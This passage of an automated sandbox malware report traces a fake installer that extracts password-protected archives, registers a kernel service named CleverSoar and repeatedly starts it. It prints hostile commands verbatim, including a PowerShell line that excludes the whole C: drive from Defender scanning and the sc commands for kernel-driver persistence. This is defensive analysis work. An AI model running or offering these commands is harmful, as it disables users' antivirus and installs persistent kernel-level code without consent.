Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_005DF5009_2_005DF500
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_005F35309_2_005F3530
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0060351A9_2_0060351A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_005FF5999_2_005FF599
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_006036019_2_00603601
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_005F77C09_2_005F77C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_005D37909_2_005D3790
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0058F8E09_2_0058F8E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_005DF9109_2_005DF910
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0057BAC99_2_0057BAC9
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_005E7AF09_2_005E7AF0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_005B3AEF9_2_005B3AEF
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_005E7C509_2_005E7C50
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0057BC929_2_0057BC92
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_005DFDF09_2_005DFDF0
Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\Windows NT\hrsw.vbc 34063D8A5CC7DE10C1514FD21463D4E5A0E99CFAB7A8EE1168E84EDE8823EDFB
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess token adjusted: SecurityJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpCode function: String function: 6CB9C240 appears 53 times
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpCode function: String function: 6CC39F10 appears 727 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 00561E40 appears 152 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 005628E3 appears 34 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 005FFB10 appears 723 times
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp.5.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exeStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp.5.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp.0.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe, 00000000.00000000.2105947406.00000000003C9000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameOtgA1A8ax7m.exe vs #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe, 00000000.00000003.2108502231.000000007F3FA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameOtgA1A8ax7m.exe vs #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe, 00000000.00000003.2108115656.0000000002F7E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameOtgA1A8ax7m.exe vs #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exeBinary or memory string: OriginalFileNameOtgA1A8ax7m.exe vs #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.12.drBinary string: \Device\TfSysMon
Source: tProtect.dll.12.drBinary string: \Device\TfKbMonPWLCache
Source: classification engineClassification label: mal92.evad.winEXE@142/31@0/0
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpCode function: 6_2_6CB69450 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,6_2_6CB69450
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00569313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,9_2_00569313
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00573D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,9_2_00573D66
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00569252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,9_2_00569252
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpCode function: 6_2_6CB68930 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,Process32NextW,6_2_6CB68930
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpFile created: C:\Program Files (x86)\Windows NT\is-BAR93.tmpJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6932:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2248:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5020:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2224:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3768:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2852:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5732:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:64:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5800:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6284:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4980:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2064:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3280:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5132:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6332:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:776:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6664:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5000:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1176:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:764:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2544:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4888:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3300:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5072:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5368:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5776:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6244:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5740:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5100:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1668:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4904:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6548:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2192:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6944:120:WilError_03
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exeFile created: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmpJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exeVirustotal: Detection: 9%
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exeString found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exeFile read: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe "C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exeProcess created: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp "C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp" /SL5="$20406,8071911,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe"
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe "C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exeProcess created: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp "C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp" /SL5="$30420,8071911,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe" /VERYSILENT
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exeProcess created: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp "C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp" /SL5="$20406,8071911,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe "C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exeProcess created: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp "C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp" /SL5="$30420,8071911,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9ialdJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
